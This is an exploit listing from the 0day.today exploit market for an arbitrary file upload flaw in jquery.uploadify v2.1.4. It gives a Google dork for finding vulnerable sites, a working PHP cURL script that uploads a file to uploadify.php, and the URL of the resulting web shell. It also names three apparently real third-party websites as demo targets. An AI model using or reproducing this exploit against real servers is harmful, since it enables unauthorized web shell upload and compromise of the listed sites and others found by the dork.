[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

jquery.uploadify-v2.1.4 Arbitrary File Upload Vulnerability

Author
Zikou-16
Risk
[
Security Risk High
]
0day-ID
0day-ID-19847
Category
web applications
Date add
01-12-2012
Platform
php
-------------------------------------------------------------------------------
          jquery.uploadify-v2.1.4 Arbitrary File Upload Vulnerability
 --------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"jquery.uploadify"
#
#######################################################################################

Exploit : uploadshell.php .asp 

<?php
 
$uploadfile="dz.php";
 
$ch = curl_init("http://localhost/scripts/jquery.uploadify-v2.1.4/uploadify.php?folder=/scripts/");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>
Shell Access : http://localhost/scripts/dz.php
 
<?php
phpinfo();
?>


#######################################################################################
#
# Demo : 
#
#  1) http://www.old.kniink.com/kniink_media/js/jquery.uploadify-v2.1.4/uploadify.php

#  2) http://boredatuni.com/scripts/jquery.uploadify-v2.1.4/uploadify.php
#  
#  3) http://www.collectrium.com/_resources/js/jquery.uploadify-v2.1.4/uploadify.php
#                                     
#######################################################################################

#  0day.today [2024-10-05]  #